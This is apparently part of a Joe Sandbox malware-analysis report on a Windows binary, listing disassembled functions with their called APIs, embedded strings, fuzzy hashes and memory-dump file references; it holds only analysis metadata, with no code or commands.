                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                    • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                    • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                                                                                                                    • Instruction ID: 8c1217110eb18c1ba447c50b9eae01a0725248d495c90baf0f5147e25d2b40a8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB41AE72A0AB4589FB55CF65E8417AE33B4EB08398F084636EE5C97B94DE3ED425C340
                                                                                                                                                                                                                    Function 00007FF656D359D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                                                                                    • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                                                                                                                                    • Instruction ID: 54d499d2dfa4014b9266ed9e07acd543889c8a4579326c62ffb27aabd4551755
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31418F72B08A4695EB10DB25D4805BC37B1FB88B98F598B32CA0DA37A5DF39E585C310
                                                                                                                                                                                                                    Function 00007FF656D276D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                    • API String ID: 4007322891-4153970271
                                                                                                                                                                                                                    • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                                                                                                                    • Instruction ID: 57c991c44a7f70307d46ecc3eeb5a428c345642c27cee4b50ea58a449e90bdf2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6531AE72A18A82D2EB50DB21E8445AD7370FF84BC4F885632EA4DA77A9DF3ED505C740
                                                                                                                                                                                                                    Function 00007FF656D1E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                                                                                                                    • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                                                                                                                    • Instruction ID: 020070c0a6be3432a646660914a2daee6126e9298faad24871ca9378259de20c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7931A171A08B8182EA109B11E8141F97361FFC9BE0F484731DAAEA77D6CE2DD545C740
                                                                                                                                                                                                                    Function 00007FF656D1E1AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                                                                                                                    • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                                                                                                                                                    • Instruction ID: 95f2eb2fce27ab8e00766f2d882b8f07468e5858cb927b56bfc3537d514d001c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF31CD21A08B8182EB109B11E8541F96361FFC9BE0F884731DA9EA37D6DE2ED549CB40
                                                                                                                                                                                                                    Function 00007FF656D2CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                    • API String ID: 2479661705-3771769585
                                                                                                                                                                                                                    • Opcode ID: cd07d64ab6c51d3608c519256f41ea01ac0918377033b5f2a2923fb92afffcd5
                                                                                                                                                                                                                    • Instruction ID: 04b67b9e79d1dcdf7f5e47cac95f65b6e208c1ea5cbe81bbb279c353f08ed0f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd07d64ab6c51d3608c519256f41ea01ac0918377033b5f2a2923fb92afffcd5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6216061B0C98791EB60AB11E8443BD6331EF98B80F484732D54EA76E5DF6EE948C300
                                                                                                                                                                                                                    Function 00007FF656D60D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2672075419-0
                                                                                                                                                                                                                    • Opcode ID: 1db3cca32f2b94c1f9954561701705ab012a7ff504e9f0ce5b1666bfbd9820cb
                                                                                                                                                                                                                    • Instruction ID: 898e0351dcd375366a0fb4b8da2e93f96062931dfdee68eaa719ecc7c0b54fb0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1db3cca32f2b94c1f9954561701705ab012a7ff504e9f0ce5b1666bfbd9820cb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C918076B086528AEB508F66D5443BD33A1FB84B88F584B35DE0DE7A99CF3AE445C700
                                                                                                                                                                                                                    Function 00007FF656D292E4 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                    • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                                                                                                                    • Instruction ID: 2b8e1cea44961ef2659fbf60d7c8890888b50732e3203d4e8cf5173e70785bd1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D311D35B0C61287E7649F26E84463972A2BB48790F595B38CD0EE7B54DE3FE886C704
                                                                                                                                                                                                                    Function 00007FF656D1E908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 685491774-0
                                                                                                                                                                                                                    • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                                                                                                                                                    • Instruction ID: cc6627aac59d9636eeb20cae15c7252850b0b11f1558fc8d561187b4b717b25e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19117F35B08A0282F7149B66E89856D3261AFCCBC0F489B39C90EDBB91DE3ED194C740
                                                                                                                                                                                                                    Function 00007FF656D1F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                    • API String ID: 0-1603158881
                                                                                                                                                                                                                    • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                                                                                                                    • Instruction ID: 32fe27118fbea36ab8b0d63a97eb21d722fd4fc81e233378dd34abef65445b5e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F12D662B1864392FA589F25C8152F9A2E1BF54784F8C4B31DA1DE73E1EFBEE545C200
                                                                                                                                                                                                                    Function 00007FF656D4767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$Init$Clear
                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                                                                                                                    • API String ID: 3467423407-1765764032
                                                                                                                                                                                                                    • Opcode ID: 85821f8e794b2a3a8eee45ec69ce5c2070fe6067264f3df14c61631e621fe35f
                                                                                                                                                                                                                    • Instruction ID: 2c68db81e0e5f5e2c0277d09d47a8e574c760a5ea8e07f7f3db81af21bba81a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85821f8e794b2a3a8eee45ec69ce5c2070fe6067264f3df14c61631e621fe35f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01A1A132A08B4286EB60CF65D4405AD77A0FB88B98F584732DE8DA7B54DFBDD845C740
                                                                                                                                                                                                                    Function 00007FF656D5A350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                                                                                                                    • String ID: -----$SysListView32
                                                                                                                                                                                                                    • API String ID: 2361508679-3975388722
                                                                                                                                                                                                                    • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                                                                                                                                    • Instruction ID: a2c94456d0dac073315ec9d0a9d298d63ddc2b451ed9e085d9e16b2c9d5541be
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E551A032A047918AE720CF65D8446EA73B1FB88788F44463ADE4D97B95CF3AD594CB40
                                                                                                                                                                                                                    Function 00007FF656D1E2CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 54windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                    • API String ID: 2019164449-3381328864
                                                                                                                                                                                                                    • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                                                                                                                                    • Instruction ID: bcd1a044ed77a9c5b56481cbc0deae615f54c79d399a5a8ee72048cccd58d1f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0216D61F1C547C0FB609B16E9443B92360AF85BC5F085736CA0EE76A1EE7EE142CB00
                                                                                                                                                                                                                    Function 00007FF656D47054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1903627254-0
                                                                                                                                                                                                                    • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                                                                                                                    • Instruction ID: 0017ac1f56fa1fdf3a685f76a881264617e806c83b97549a0f58f79e2c388698
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36027E62A08A8286DB90DF29D4441BD7770FB84B89F144632EF8E97764CFBED949C740
                                                                                                                                                                                                                    Function 00007FF656D5C324 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
